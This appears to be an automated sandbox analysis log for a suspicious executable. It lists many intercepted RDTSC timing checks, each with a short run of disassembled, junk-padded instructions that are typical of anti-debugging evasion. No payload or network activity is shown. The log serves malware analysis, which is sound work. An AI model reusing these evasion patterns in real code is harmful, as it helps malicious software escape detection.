Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE57B second address: 4DE585 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE585 second address: 4DE589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DE829 second address: 4DE82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DED7B second address: 4DED7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DEE05 second address: 4DEE0F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DEE0F second address: 4DEE14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DEE14 second address: 4DEE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c mov esi, ecx 0x0000000e nop 0x0000000f jmp 00007F5BC10A3604h 0x00000014 push eax 0x00000015 ja 00007F5BC10A3602h 0x0000001b jne 00007F5BC10A35FCh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DF21E second address: 4DF224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DF224 second address: 4DF229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DF841 second address: 4DF845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4DF845 second address: 4DF8A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F5BC10A35F8h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F5BC10A3601h 0x00000015 nop 0x00000016 add di, D572h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F5BC10A35F8h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 mov dword ptr [ebp+122D19EAh], ecx 0x0000003d push 00000000h 0x0000003f or di, 4F1Eh 0x00000044 push eax 0x00000045 push ebx 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E0280 second address: 4E0286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E0286 second address: 4E028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E13DB second address: 4E13DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E344D second address: 4E3451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E3245 second address: 4E324B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E3451 second address: 4E346A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F5BC10A35FCh 0x0000000c popad 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E324B second address: 4E3250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E346A second address: 4E34ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3603h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b call 00007F5BC10A3601h 0x00000010 mov dword ptr [ebp+122D1BF1h], esi 0x00000016 pop esi 0x00000017 push 00000000h 0x00000019 clc 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F5BC10A35F8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 0000001Ch 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 add dword ptr [ebp+12482E29h], eax 0x0000003c pushad 0x0000003d movzx eax, si 0x00000040 push ecx 0x00000041 xor eax, 3A6EABC3h 0x00000047 pop edi 0x00000048 popad 0x00000049 xchg eax, ebx 0x0000004a jmp 00007F5BC10A35FAh 0x0000004f push eax 0x00000050 jbe 00007F5BC10A3600h 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E3FD2 second address: 4E3FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E8EF4 second address: 4E8EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E94F3 second address: 4E950C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F5BC10B7098h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F5BC10B709Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E950C second address: 4E9510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E522E second address: 4E5232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4EA7AB second address: 4EA7D1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5BC10A3607h 0x00000008 jmp 00007F5BC10A3601h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F5BC10A35F8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4EA7D1 second address: 4EA83D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5BC10B7098h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov di, bx 0x0000000e push dword ptr fs:[00000000h] 0x00000015 jp 00007F5BC10B7096h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 jmp 00007F5BC10B709Eh 0x00000027 mov eax, dword ptr [ebp+122D1721h] 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F5BC10B7098h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 add dword ptr [ebp+1247BFE9h], edx 0x0000004d push FFFFFFFFh 0x0000004f sub bx, 5077h 0x00000054 nop 0x00000055 jnl 00007F5BC10B70A4h 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4EA83D second address: 4EA843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4EB945 second address: 4EB94A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4EA843 second address: 4EA84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4EC918 second address: 4EC91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4ED760 second address: 4ED765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4ED765 second address: 4ED7AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F5BC10B7096h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push ebx 0x00000012 mov dword ptr [ebp+12452B7Ah], edi 0x00000018 pop edi 0x00000019 mov dword ptr [ebp+122D19AAh], eax 0x0000001f push 00000000h 0x00000021 or dword ptr [ebp+1245E0D7h], edx 0x00000027 push 00000000h 0x00000029 mov edi, 64DA5EC1h 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 push eax 0x00000031 pushad 0x00000032 popad 0x00000033 pop eax 0x00000034 pushad 0x00000035 jns 00007F5BC10B7096h 0x0000003b push eax 0x0000003c pop eax 0x0000003d popad 0x0000003e popad 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 jl 00007F5BC10B7096h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4ED95B second address: 4ED968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F5BC10A35F6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F0734 second address: 4F073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5BC10B7096h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F073E second address: 4F0762 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F5BC10A3605h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F3710 second address: 4F3715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F0822 second address: 4F0826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F3715 second address: 4F37B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007F5BC10B70A9h 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D1A84h], edx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F5BC10B7098h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D1BECh], edx 0x00000039 mov bx, dx 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebp 0x00000041 call 00007F5BC10B7098h 0x00000046 pop ebp 0x00000047 mov dword ptr [esp+04h], ebp 0x0000004b add dword ptr [esp+04h], 00000016h 0x00000053 inc ebp 0x00000054 push ebp 0x00000055 ret 0x00000056 pop ebp 0x00000057 ret 0x00000058 movzx edi, dx 0x0000005b mov bl, 7Ch 0x0000005d xchg eax, esi 0x0000005e jmp 00007F5BC10B709Fh 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 push ecx 0x00000069 pop ecx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F0826 second address: 4F082A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F37B8 second address: 4F37BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F280B second address: 4F2813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F5A7B second address: 4F5A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F7806 second address: 4F781A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BC10A35FFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F5A7F second address: 4F5A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F781A second address: 4F7835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F5BC10A3601h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F86E5 second address: 4F86F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F5BC10B7096h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4F86F0 second address: 4F8706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5BC10A35FCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4954F1 second address: 495509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B709Eh 0x00000009 ja 00007F5BC10B7096h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50106A second address: 501076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5BC10A35F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 501076 second address: 50107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50107D second address: 5010A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F5BC10A35FAh 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 je 00007F5BC10A35F6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push edi 0x0000001c pushad 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 501398 second address: 50139C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 505BB2 second address: 505BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 505BB8 second address: 505BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 505BBC second address: 505BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 505C63 second address: 505C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 505CAE second address: 505CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A1EA second address: 50A1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A8E7 second address: 50A905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F5BC10A3607h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50ACD3 second address: 50ACD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50ACD7 second address: 50AD12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5BC10A3608h 0x0000000b push eax 0x0000000c pushad 0x0000000d jo 00007F5BC10A35F6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007F5BC10A35FCh 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50AD12 second address: 50AD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50AEB5 second address: 50AEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B035 second address: 50B05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F5BC10B70A4h 0x0000000c pushad 0x0000000d jns 00007F5BC10B7096h 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B05D second address: 50B065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B065 second address: 50B06B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B1A8 second address: 50B1AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B1AC second address: 50B1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B317 second address: 50B334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5BC10A3602h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50FAB4 second address: 50FAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50FAB8 second address: 50FABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50FABE second address: 50FAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50FAC4 second address: 50FACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50FACC second address: 50FAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4A1111 second address: 4A114D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F5BC10A3646h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5BC10A3604h 0x00000017 jmp 00007F5BC10A3606h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4A114D second address: 4A1161 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5BC10B7096h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F5BC10B7096h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4A1161 second address: 4A116B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5BC10A35F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E737F second address: 4E7383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E7383 second address: 4E738C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E738C second address: 4E73D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 adc edi, 53C36F93h 0x0000000f lea eax, dword ptr [ebp+1248C0BAh] 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F5BC10B7098h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f cld 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 js 00007F5BC10B7098h 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E7893 second address: 4E7899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E7A90 second address: 4E7AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 ja 00007F5BC10B7096h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jns 00007F5BC10B7096h 0x0000001a popad 0x0000001b rdtsc
